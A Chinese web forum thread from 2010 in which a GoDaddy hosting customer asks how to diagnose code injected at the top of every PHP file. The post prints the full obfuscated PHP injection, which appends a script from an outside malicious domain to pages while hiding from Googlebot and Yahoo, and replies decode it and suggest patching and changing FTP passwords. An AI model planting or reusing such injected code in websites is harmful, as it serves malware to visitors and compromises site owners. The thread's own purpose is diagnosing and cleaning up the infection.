[提问]
GD空间所有php文件都被插入代码 如何排查?
|
|
GD空间下的所有php文件开头都被插入如下代码,现象是在浏览页面时会不定时的弹出一个窗口(应该是恶意程序)!
请问为什么会发生这种情况?
还有GD主机写入权限应该是关闭的吧?如果说是程序漏洞的话,安装的WP、PHPCMS都存在两样的漏洞么?就算把所有程序中的恶意程序都替换过来,也难免这种情况会再次发生!
请高手帮忙分析一下,谢谢!
- <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjF**k3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjF**k3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
|
|
|
|
|
|
|
|
|
|
|
|
add.c
发表于 2010-5-10 10:47:31
|
显示全部楼层
很可能是程序漏洞问题, 打程序补丁
修改ftp密码 , 查杀本机木马 |
|
|
|
|
|
|
|
|
|
|
|
yilot
发表于 2010-5-10 10:49:41
|
显示全部楼层
我之前IX空间也一样。
后来他们技术人员批量删除代码的。
估计整个服务器被攻击了吧。
这个代码添加程序是自动的,我删除了,就会自动添加上来。
所以还是联系他们的技术人员。让他们检查漏洞。
IX那边后来把我的目录里放了一个文件,设置ftp连接ip限制的。我每次把我的ip放进去,只有我能ftp连接。
不知道是不是他们发现是ftp账号被恶意登陆导致。 |
|
|
|
|
|
|
|
|
|
|
|
goldstein
发表于 2010-5-10 10:55:28
|
显示全部楼层
解密之后的代码:
<?php
if (function_exists('ob_start') && !isset($GLOBALS['mr_no']))
{
$GLOBALS['mr_no'] = 1;
if (!function_exists('mrobh'))
{
if (!function_exists('gml'))
{
function gml()
{
if (!stristr($_SERVER["HTTP_USER_AGENT"], "googlebot") && (!stristr
($_SERVER["HTTP_USER_AGENT"], "yahoo")))
{
return base64_decode(
"PHNjcmlwdCBzcmM9Imh0dHA6Ly9pbmRlc2lnbnN0dWRpb2luZm8uY29tL2xzLnBocCI+PC9zY3JpcHQ+");
}
return "";
}
}
if (!function_exists('gzdecode'))
{
function gzdecode($R5A9CF1B497502ACA23C8F611A564684C)
{
$R30B2AB8DC1496D06B230A71D8962AF5D = @ord(@substr
($R5A9CF1B497502ACA23C8F611A564684C, 3, 1));
$RBE4C4D037E939226F65812885A53DAD9 = 10;
$RA3D52E52A48936CDE0F5356BB08652F2 = 0;
if ($R30B2AB8DC1496D06B230A71D8962AF5D & 4)
{
$R63BEDE6B19266D4EFEAD07A4D91E29EB = @unpack('v', substr($R5A9CF
//........
?> |
|
|
|
|
|
|
|
|
|
|
|
goldstein
发表于 2010-5-10 11:00:07
|
显示全部楼层
这家伙很喜欢加密,代码里面大量使用加密手段。- PHNjcmlwdCBzcmM9Imh0dHA6Ly9pbmRlc2lnbnN0dWRpb2luZm8uY29tL2xzLnBocCI+PC9zY3JpcHQ+
- <script src="http://indesignstudioinfo.com/ls.php"></script>
|
|
|
|
|
|
|
|
|
|
|
|
pittzh
发表于 2010-5-10 11:03:40
|
显示全部楼层
- <script src="http://indesignstudioinfo.com/ls.php"></script>
最终体现在页面中的就包括这么一段代码,在页面的最下面!
我先改一下FTP密码 杀下病毒
非常感谢 |
|
|
|
|
|
|
|
|
|
|
|
goldstein
发表于 2010-5-10 11:05:19
|
显示全部楼层
上面这个地址就是个PHP木马,你的所有页面都被XSS跨站挂了这个马。
木马名字为:Trojan.JS.Redirector.cq
可惜的是,此马已经被识别出来,无法过杀软免杀了。
同时这家伙很聪明的避开了Google和Yahoo,要不被Google发现了就会显示 “This Site may harm your computer” 等有毒信息。
代码很有意思,我再研究下,很多技巧值得学习。
[ 本帖最后由 goldstein 于 2010-5-10 11:08 AM 编辑 ] |
评分
-
查看全部评分
|
|
|
|
|
|
|
|
|
|
|
add.c
发表于 2010-5-10 11:09:52
|
显示全部楼层
楼上果然高手  |
|
|
|
|
|
|
|
|
|
|
|
pittzh
发表于 2010-5-10 11:12:05
|
显示全部楼层
回复 7# 的帖子
如何彻底根除呢?
做站的时候如何规避这种情况呢?
goldstein 请指教!
想必遇到这种情况的朋友不在少数!
谢谢~~ |
|
|
|
|
|
|
|
|
|
|
|
www.cpanel.my
发表于 2010-5-10 11:15:37
|
显示全部楼层
|
|
|
|
|
|
|
|
|
GoDaddy
9579 人阅读
|
34 人回复
狗仔卡
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
